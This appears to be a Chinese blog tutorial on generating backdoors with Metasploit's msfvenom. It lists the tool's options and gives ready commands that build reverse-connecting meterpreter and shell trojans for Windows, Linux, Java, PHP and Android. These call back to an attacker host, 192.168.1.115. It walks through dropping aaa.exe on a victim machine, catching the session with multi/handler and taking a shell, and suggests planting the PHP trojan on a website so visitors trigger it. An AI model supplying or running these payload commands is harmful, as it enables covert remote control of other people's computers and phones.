MSF-Shellcode生成和使用

时间:2016-12-08 14:07:28   收藏:0   阅读:1466

1      使用环境

Kali 2.0

msfvenom

2      Msfvenom参数说明

msfvenom –h    查看帮助

说明:

Options:

     -p, --payload     <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定

     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

     -n, --nopsled     <length>        payload预先指定一个NOP滑动长度

     -f, --format      <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)

     -a, --arch        <architecture>  指定payload的目标架构

         --platform    <platform>      指定payload的目标平台

     -s, --space       <length>        设定有效攻击荷载的最大长度

     -b, --bad-chars   <list>          设定规避字符集,比如: &#039;\x00\xff&#039;

     -i, --iterations <count>          指定payload的编码次数

     -c, --add-code    <path>          指定一个附加的win32 shellcode文件

     -x, --template    <path>          指定一个自定义的可执行文件作为模板

     -k, --keep                        保护模板程序的动作,注入的payload作为一个新的进程运行

         --payload-options            列举payload的标准选项

     -o, --out   <path>               保存payload

     -v, --var-name <name>             指定一个自定义的变量,以确定输出格式

         --shellest                   最小化生成payload

     -h, --help                        查看帮助选项

         --help-formats               查看msf支持的输出格式列表

 

2.1  命常用帮助命令

msfvenom --help-formats     查看有哪些格式输出

技术分享

 

msfvenom -l encoders       查看有哪些编码方式

3      Metasploit生成多种后门

Metasploit可以生成各种格式的后门,有phpexewindows下后门)、linux环境下后门,java后门、androiw后门等等。

可以生成aspaspxphpjspwarexe等多种类型

 

现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayloadmsfencode

 

 

3.1  生成window下后门程序

使用以下模块生成windows系统下后门程序。

windows/meterpreter/reverse_tcp

 

生成木马程序时如果可以指定也可以不指定--arch x86 --platform windows,不指定则会报错提示,不用理会,-p后写指定的payload-f后指定文件格式。

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe

技术分享

或者指定参数如下:

使用生成木马命令:

msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe

技术分享

 

被中木马的机器IP地址是192.168.1.123

把在kali的根目录生产的木马程序aaa.exe文件拷贝到被攻击的机器上面去192.168.1.123上。

技术分享

 

======================================================

设置监听:

使用监听模块:use exploit/multi/handler

技术分享


使用payload

技术分享

 

技术分享

技术分享

技术分享

执行监听

技术分享

 

=================================================

 

在被攻击的机器上面双机运行aaa.exe木马,此时在kali上面观看结果如下:

说明192.168.1.123已经被中木马了,可以控制此机器了。

技术分享

 

通过输入shell来进入控制台控制机器。

技术分享

 

查看机器的ip地址是否是192.168.1.123

技术分享

3.2  生成linux下后门程序

使用以下模块生成linux后门程序,操作方法跟windows后门使用一样。

linux/x86/shell_reverse_tcp

 

windows系统唯一的区别是在linux下生成的木马需要给这个程序可执行的权限,通过使用以下命令chmod

Chmod +x 程序名

 

linux下执行木马程序命令:

./程序名

3.3  生成Java后门程序

Java程序在windows下和在linux下都可以生效执行的

 

使用以下模块生成后门程序:

java/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar

技术分享


3.4  生成PHP后门程序

使用模块:

php/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php

技术分享

 

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

3.5  生成Android后门程序

使用模块:

android/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk

技术分享

 


评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!